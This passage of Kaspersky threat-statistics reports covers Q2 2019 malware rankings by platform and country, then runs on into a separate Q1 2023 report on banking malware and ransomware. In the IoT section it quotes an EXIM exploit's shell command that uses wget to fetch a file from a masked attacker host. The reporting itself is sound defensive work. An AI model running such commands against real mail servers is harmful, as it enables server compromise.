Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAnother interesting vector for delivering a malicious miner to victims was also [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. 
Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. 
The assumption is that cybercriminals are gradually switching to more productive hardware that supports SSH.

| Service | % |
|---|---|
| SSH | 40.43% |
| Telnet | 59.57% |

_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_

However, in terms of the number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2.

| Service | % |
|---|---|
| SSH | 49.59% |
| Telnet | 50.41% |

_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_

### Telnet-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)

#### Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps

| | Country | % |
|---|---|---|
| 1 | Egypt | 15.06 |
| 2 | China | 12.27 |
| 3 | Brazil | 10.24 |
| 4 | US | 5.23 |
| 5 | Russia | 5.03 |
| 6 | Greece | 4.54 |
| 7 | Iran | 4.06 |
| 8 | Taiwan | 3.15 |
| 9 | India | 3.04 |
| 10 | Turkey | 2.90 |

For the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.

Telnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.

#### Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks

| | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 38.92 |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 |
| 3 | Backdoor.Linux.Mirai.ba | 26.48 |
| 4 | Backdoor.Linux.Mirai.au | 15.75 |
| 5 | Backdoor.Linux.Gafgyt.bj | 2.70 |
| 6 | Backdoor.Linux.Mirai.ad | 2.57 |
| 7 | Backdoor.Linux.Gafgyt.az | 2.45 |
| 8 | Backdoor.Linux.Mirai.h | 1.38 |
| 9 | Backdoor.Linux.Mirai.c | 1.36 |
| 10 | Backdoor.Linux.Gafgyt.av | 1.26 |

_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks._

As things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.

### SSH-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)

#### Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps

| | Country | % |
|---|---|---|
| 1 | Vietnam | 15.85 |
| 2 | China | 14.51 |
| 3 | Egypt | 12.17 |
| 4 | Brazil | 6.91 |
| 5 | Russia | 6.66 |
| 6 | US | 5.05 |
| 7 | Thailand | 3.76 |
| 8 | Azerbaijan | 3.62 |
| 9 | India | 2.43 |
| 10 | France | 2.12 |

In Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps over the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped to seventh.

## Financial threats

### Financial threat statistics

In Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.

_Number of unique users attacked by financial malware, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)

### Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)

#### Top 10 countries by share of attacked users

| | **Country\*** | **%\*\*** |
|---|---|---|
| 1 | Belarus | 2.0 |
| 2 | Venezuela | 1.8 |
| 3 | China | 1.6 |
| 4 | Indonesia | 1.3 |
| 5 | South Korea | 1.3 |
| 6 | Cyprus | 1.2 |
| 7 | Paraguay | 1.2 |
| 8 | Russia | 1.2 |
| 9 | Cameroon | 1.1 |
| 10 | Serbia | 1.1 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._
_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._

#### Top 10 banking malware families

| | **Name** | **Verdicts** | **%\*** |
|---|---|---|---|
| 1 | RTM | Trojan-Banker.Win32.RTM | 32.2 |
| 2 | Zbot | Trojan.Win32.Zbot | 23.3 |
| 3 | Emotet | Backdoor.Win32.Emotet | 8.2 |
| 4 | Nimnul | Virus.Win32.Nimnul | 6.4 |
| 5 | Trickster | Trojan.Win32.Trickster | 5.0 |
| 6 | Nymaim | Trojan.Win32.Nymaim | 3.5 |
| 7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 |
| 8 | Neurevt | Trojan.Win32.Neurevt | 2.8 |
| 9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 |
| 10 | Gozi | Trojan.Win32.Gozi | 1.1 |

_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._

In Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all of the botnet's C&C servers were unavailable.

We also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) entered the Top 10 families, taking ninth and tenth places respectively.

## Ransomware programs

### Quarterly highlights

After almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.

In Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons: it was distributed by hacking vulnerable servers, it used a rare LPE exploit, and it employed a complex cryptographic scheme.

Also this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough.
However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.

### Number of new modifications

In Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.

_Number of new ransomware modifications, Q2 2018 – Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)

The majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware: it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.

### Number of users attacked by ransomware Trojans

In Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is more than 50,000 fewer than in the previous quarter.

_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)

The busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June it amounted to a little over 82,000.

### Attack geography

_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)

#### Top 10 countries attacked by ransomware Trojans

| | **Country\*** | **% of users attacked by ransomware\*\*** |
|---|---|---|
| 1 | Bangladesh | 8.81% |
| 2 | Uzbekistan | 5.52% |
| 3 | Mozambique | 4.15% |
| 4 | Ethiopia | 2.42% |
| 5 | Nepal | 2.26% |
| 6 | Afghanistan | 1.50% |
| 7 | China | 1.18% |
| 8 | Ghana | 1.17% |
| 9 | Korea | 1.07% |
| 10 | Kazakhstan | 1.06% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware Trojans

| | **Name** | **Verdict\*** | **Percentage of attacked users\*\*** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% |
| 3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% |
| 7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% |
| 8 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.45% |
| 9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% |
| 10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% |

_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._
_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._

## Miners

### Number of new modifications

In Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.

_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)

The largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less frequently.

### Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.

_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)

Throughout the quarter, the number of attacked users gradually decreased: from 383,000 in April to 318,000 in June.

### Attack geography

_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)

**Top 10 countries by share of users attacked by miners**

| | **Country\*** | **% of users attacked by miners\*\*** |
|---|---|---|
| 1 | Afghanistan | 10.77% |
| 2 | Ethiopia | 8.99% |
| 3 | Uzbekistan | 6.83% |
| 4 | Kazakhstan | 4.76% |
| 5 | Tanzania | 4.66% |
| 6 | Vietnam | 4.28% |
| 7 | Mozambique | 3.97% |
| 8 | Ukraine | 3.08% |
| 9 | Belarus | 3.06% |
| 10 | Mongolia | 3.06% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyber attacks

Over the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception: the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These are stack overflows caused by bugs in object processing in the Equation Editor component of Microsoft Office, and they allow remote code execution. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.

The increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers.
In other words, these exploits are more likely to succeed, since the document format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)

The share of detected exploits for vulnerabilities in web browsers in Q2 amounted to 14%, five times smaller than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation and in the various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for possible changes to data or data types during such processing, at points where the compiler/optimizer does not expect them, often give rise to new vulnerabilities. Other common bugs that can lead to remote code execution in web browsers are integer overflows, use-after-free, and type confusion. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it chained two vulnerabilities, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.

On the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).

The share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>) into use. A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem of Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers and to build a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient validation of incoming packets allows an attacker to trigger a use-after-free and overwrite data in kernel memory. Note that exploitation does not require a valid account on the target, as it takes place at the authorization stage, before the username and password are checked.

### Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

#### Countries that are sources of web-based attacks: Top 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)

This quarter, Web Anti-Virus was most active on resources located in the US.
Overall, the Top 4 remained unchanged from the previous quarter.

#### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Algeria | 20.38 |
| 2 | Venezuela | 19.13 |
| 3 | Albania | 18.30 |
| 4 | Greece | 17.36 |
| 5 | Moldova | 17.30 |
| 6 | Bangladesh | 16.82 |
| 7 | Estonia | 16.68 |
| 8 | Azerbaijan | 16.59 |
| 9 | Belarus | 16.46 |
| 10 | Ukraine | 16.18 |
| 11 | France | 15.84 |
| 12 | Philippines | 15.46 |
| 13 | Armenia | 15.40 |
| 14 | Tunisia | 15.29 |
| 15 | Bulgaria | 14.73 |
| 16 | Poland | 14.69 |
| 17 | Réunion | 14.68 |
| 18 | Latvia | 14.65 |
| 19 | Peru | 14.50 |
| 20 | Qatar | 14.32 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.

_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)

### Local threats

_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._

In Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.

#### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Afghanistan | 55.43 |
| 2 | Tajikistan | 55.27 |
| 3 | Uzbekistan | 55.03 |
| 4 | Yemen | 52.12 |
| 5 | Turkmenistan | 50.75 |
| 6 | Laos | 46.12 |
| 7 | Syria | 46.00 |
| 8 | Myanmar | 45.61 |
| 9 | Mongolia | 45.59 |
| 10 | Ethiopia | 44.95 |
| 11 | Bangladesh | 44.11 |
| 12 | Iraq | 43.79 |
| 13 | China | 43.60 |
| 14 | Bolivia | 43.47 |
| 15 | Vietnam | 43.22 |
| 16 | Venezuela | 42.71 |
| 17 | Algeria | 42.33 |
| 18 | Cuba | 42.31 |
| 19 | Mozambique | 42.14 |
| 20 | Rwanda | 42.02 |

_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)

Overall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.

The figure for Russia was 26.14%.

_Source: securelist, "IT threat evolution Q2 2019. Statistics", published 2019-08-19, <https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/>. CVEs referenced: CVE-2017-11882, CVE-2017-8570, CVE-2017-8759, CVE-2018-0798, CVE-2018-0802, CVE-2019-0708, CVE-2019-0841, CVE-2019-0863, CVE-2019-0973, CVE-2019-10149, CVE-2019-1069, CVE-2019-11707, CVE-2019-11708._

 * [IT threat evolution in Q1 2023](<https://securelist.com/it-threat-evolution-q1-2023/109838/>)
 * **IT threat evolution in Q1 2023. Non-mobile statistics**
 * [IT threat evolution in Q1 2023. Mobile statistics](<https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/>)

_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q1 2023:

 * Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
 * Web Anti-Virus detected 246,912,694 unique URLs as malicious.
 * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 106,863 unique users.
 * Ransomware attacks were defeated on the computers of 60,900 unique users.
 * Our File Anti-Virus detected 43,827,839 unique malicious and potentially unwanted objects.

## Financial threats

### Financial threat statistics

In Q1 2023, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 106,863 unique users.

_Number of unique users attacked by financial malware, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161548/01-en-malware-report-q1-2023-pc-statistics.png>))_

### Geography of financial malware attacks

_To evaluate and compare the risk of being infected by banking Trojans or ATM/POS malware worldwide, for each country and territory, we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._

**TOP 10 countries/territories by share of attacked users**

| | **Country/territory\*** | **%\*\*** |
|---|---|---|
| 1 | Turkmenistan | 4.7 |
| 2 | Afghanistan | 4.6 |
| 3 | Paraguay | 2.8 |
| 4 | Tajikistan | 2.8 |
| 5 | Yemen | 2.3 |
| 6 | Sudan | 2.3 |
| 7 | China | 2.0 |
| 8 | Switzerland | 2.0 |
| 9 | Egypt | 1.9 |
| 10 | Venezuela | 1.8 |

_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._
_** Unique 
users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country/territory._

**TOP 10 banking malware families**

| | **Name** | **Verdicts** | **%\*** |
|---|---|---|---|
| 1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 28.9 |
| 2 | Emotet | Trojan-Banker.Win32.Emotet | 19.5 |
| 3 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 18.3 |
| 4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6.5 |
| 5 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.9 |
| 6 | Danabot | Trojan-Banker.Win32.Danabot | 2.3 |
| 7 | IcedID | Trojan-Banker.Win32.IcedID | 1.9 |
| 8 | SpyEyes | Trojan-Spy.Win32.SpyEye | 1.6 |
| 9 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 |
| 10 | Qbot/Qakbot | Trojan-Banker.Win32.Qbot | 1.1 |

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly trends and highlights

#### Attacks on Linux and VMWare ESXi servers

An increasing number of ransomware families are extending their reach by adding support for operating systems other than Windows, which they have traditionally targeted. In Q1 2023, we discovered builds from several ransomware families intended for running on Linux and VMWare ESXi servers, namely: ESXiArgs (new family), Nevada (a rebranding of Nokoyawa, which is written in Rust), Royal, and IceFire.

Thus, the arsenals of most professional extortion groups today include ransomware builds designed for several platforms, maximizing the damage they can cause to their victims.

#### Progress in combating cybercrime

[Europol](<https://www.europol.europa.eu/media-press/newsroom/news/cybercriminals-stung-hive-infrastructure-shut-down>) and the [U.S. Department of Justice](<https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant>) announced that as a result of a joint operation with the FBI that started in July 2022, the FBI penetrated networks belonging to the Hive group and obtained decryption keys for more than 1,300 victims. The law enforcement agencies also obtained information about 250 Hive affiliates and seized several servers belonging to the group.

The Netherlands Police [arrested](<https://www.bleepingcomputer.com/news/security/dutch-police-arrest-three-ransomware-actors-extorting-25-million/>) [three individuals](<https://www.politie.nl/nieuws/2023/februari/23/05-drie-mannen-aangehouden-in-onderzoek-naar-grootschalige-internationale-datadiefstal-en-datahandel.html>) suspected of stealing confidential data and extorting €100,000 to €700,000 from each victim company.

Europol [announced](<https://www.europol.europa.eu/media-press/newsroom/news/germany-and-ukraine-hit-two-high-value-ransomware-targets>) it had arrested two suspected core members of DoppelPaymer during a [joint operation](<https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/>) with the FBI and the law enforcement agencies of Germany, Ukraine, and the Netherlands. The team also seized hardware, which the law enforcement agencies will inspect during further investigation.

#### Conti-based Trojan decrypted

Kaspersky analysts [released](<https://usa.kaspersky.com/about/press-releases/2023_kaspersky-releases-tool-for-decrypting-conti-based-ransomware>) a utility for decrypting files affected by a Trojan known to researchers as MeowCorp. The malware was compiled from Conti source code, which was published last year. An archive containing the secret keys, 258 in all, was posted on an online forum. We added these, along with data decryption code, to the [latest version of RakhniDecryptor](<https://support.kaspersky.com/common/disinfection/10556>).

## Most prolific groups

This section looks at ransomware groups that engage in so-called "double extortion", that is, stealing confidential data in addition to encrypting it. Most of these groups target large companies, and many maintain a DLS (data leak site), where they publish a list of organizations they have attacked. The diagram below reflects the most prolific extortion gangs, that is, the ones that added the largest numbers of victims to their DLSs.

_Most prolific ransomware gangs. The diagram shows each group's share of victims out of the total number of victims published on all the groups' DLSs in Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161701/02-en-malware-report-q1-2023-pc-statistics.png>))_

### Number of new modifications

In Q1 2023, we detected nine new ransomware families and 3,089 new modifications of this type of malware.

